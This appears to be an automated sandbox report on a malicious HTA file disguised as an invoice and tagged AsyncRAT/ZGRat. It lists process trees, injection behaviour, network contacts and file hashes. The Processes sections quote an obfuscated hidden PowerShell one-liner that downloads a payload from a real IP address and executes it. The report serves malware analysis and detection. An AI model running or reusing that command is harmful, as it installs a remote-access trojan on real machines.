Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-v5ehpsec7z
Target 16112023_0133_15112023_Invoice#2356876431.hta
SHA256 c08e13a2fe6a0b69b2c67f0fbd73c72c7c49bbdedef556da6b57197f995979e1
Tags
asyncrat zgrat sended@ rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c08e13a2fe6a0b69b2c67f0fbd73c72c7c49bbdedef556da6b57197f995979e1

Threat Level: Known bad

The file 16112023_0133_15112023_Invoice#2356876431.hta was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat sended@ rat

Detect ZGRat V1

AsyncRat

ZGRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 17:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 17:34

Reported

2023-11-15 17:36

Platform

win7-20231023-en

Max time kernel

128s

Max time network

121s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2888 wrote to memory of 2704 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2704 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2704 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2704 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1724 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WScript.exe
PID 1224 wrote to memory of 1724 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WScript.exe
PID 1224 wrote to memory of 1724 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WScript.exe
PID 1724 wrote to memory of 960 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1724 wrote to memory of 960 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1724 wrote to memory of 960 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 960 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 960 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 960 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\system32\taskeng.exe

taskeng.exe {0BB06A32-9F4E-44DC-822A-1C2DA145C618} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\Conted.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"

Network

Country Destination Domain Proto
FR 185.81.157.213:222 185.81.157.213 tcp
FR 185.81.157.213:222 185.81.157.213 tcp

Files

memory/2704-3-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/2704-4-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/2704-5-0x00000000026E0000-0x0000000002720000-memory.dmp

memory/2704-6-0x00000000026E0000-0x0000000002720000-memory.dmp

memory/2704-9-0x0000000071460000-0x0000000071A0B000-memory.dmp

C:\Users\Public\Conted.vbs

MD5 110da9d3474ba64fa1a18c173685c25d
SHA1 9f093829518a9268bf9807fda7bef47e7832c497
SHA256 a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512 ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

C:\Users\Public\Conted.bat

MD5 759278dd3dc3679bf7efd1ec681c0aa1
SHA1 72b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256 cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA512 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7C56MLPQ9URVD4E08GK6.temp

MD5 b736b7049ac70ea3c2bde2fa7c318379
SHA1 6e34afeefd821bfc50417181197157cc7a980ba0
SHA256 a10aeb64e89586ddc3de876ca9edbf394a4fe80fb89f97ff26aa5b6674ef8201
SHA512 3f2002fd6a90f3725962e6b251d6d6e40996339596a93c2b1fb21a00e93482f1c1cf4348529248ba809f43f0940d98c9f6f8ae67adcfb7c68a4efc18e07f99a6

memory/2788-19-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

memory/2788-20-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2788-21-0x000000001B110000-0x000000001B3F2000-memory.dmp

memory/2788-22-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2788-23-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2788-24-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2788-25-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 17:34

Reported

2023-11-15 17:36

Platform

win10v2004-20231023-en

Max time kernel

151s

Max time network

134s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4904 set thread context of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 852 wrote to memory of 4016 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 852 wrote to memory of 4016 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 852 wrote to memory of 4016 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 1832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4872 wrote to memory of 1832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1832 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
FR 185.81.157.213:222 185.81.157.213 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 213.157.81.185.in-addr.arpa udp
FR 185.81.157.213:222 185.81.157.213 tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 113.208.253.8.in-addr.arpa udp

Files

memory/4016-1-0x00000000705E0000-0x0000000070D90000-memory.dmp

memory/4016-2-0x0000000003220000-0x0000000003230000-memory.dmp

memory/4016-3-0x0000000003150000-0x0000000003186000-memory.dmp

memory/4016-4-0x0000000003220000-0x0000000003230000-memory.dmp

memory/4016-5-0x0000000005980000-0x0000000005FA8000-memory.dmp

memory/4016-6-0x0000000005860000-0x0000000005882000-memory.dmp

memory/4016-7-0x0000000006060000-0x00000000060C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecibrcnr.ww4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4016-13-0x00000000060D0000-0x0000000006136000-memory.dmp

memory/4016-18-0x0000000006140000-0x0000000006494000-memory.dmp

memory/4016-19-0x0000000006740000-0x000000000675E000-memory.dmp

memory/4016-20-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/4016-21-0x0000000003220000-0x0000000003230000-memory.dmp

memory/4016-22-0x0000000007D60000-0x00000000083DA000-memory.dmp

memory/4016-23-0x0000000006CC0000-0x0000000006CDA000-memory.dmp

memory/4016-29-0x00000000705E0000-0x0000000070D90000-memory.dmp

C:\Users\Public\Conted.vbs

MD5 110da9d3474ba64fa1a18c173685c25d
SHA1 9f093829518a9268bf9807fda7bef47e7832c497
SHA256 a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512 ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

C:\Users\Public\Conted.bat

MD5 759278dd3dc3679bf7efd1ec681c0aa1
SHA1 72b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256 cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA512 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

memory/4904-34-0x0000022074450000-0x0000022074472000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 314959276fcbaa5fa5b31c8e49de1d0e
SHA1 8a3414c59816f766f6fbd77803fc92eee838c552
SHA256 202b174e43662acf51eb04e5e9bbc90b24c0dea103aed76baf966ca175ae8ec7
SHA512 1282d949b65409578388a0ff2c9830c6b9a94e22c936ce0978107a2c9b47be97eac808a7914bfc4bc977be545730b9d0f4457a0c57bbccbdde1be6249fc7e554

memory/4904-45-0x00007FFEBA220000-0x00007FFEBACE1000-memory.dmp

memory/4904-46-0x0000022072810000-0x0000022072820000-memory.dmp

C:\Users\Public\Conted.ps1

MD5 ba03b4e7a4ad2bd4a2f5bce388d8f489
SHA1 f71681ee8115d4349084ad5c26e790a926bbea84
SHA256 d6b98f02b41a30cd4578acfd549e2d6fe64036f00c1830193d342c0454068b5a
SHA512 6dc307567baa0a1def8b9e480477985ccbdb7e5628c4d972a5804b282006d0717ddd728c449f8fbfcd2669a1a868c516d5924ab3a1f3d1b8e4bd1272fc04c665

memory/4904-48-0x0000022075130000-0x000002207514A000-memory.dmp

memory/3184-49-0x0000000000400000-0x0000000000416000-memory.dmp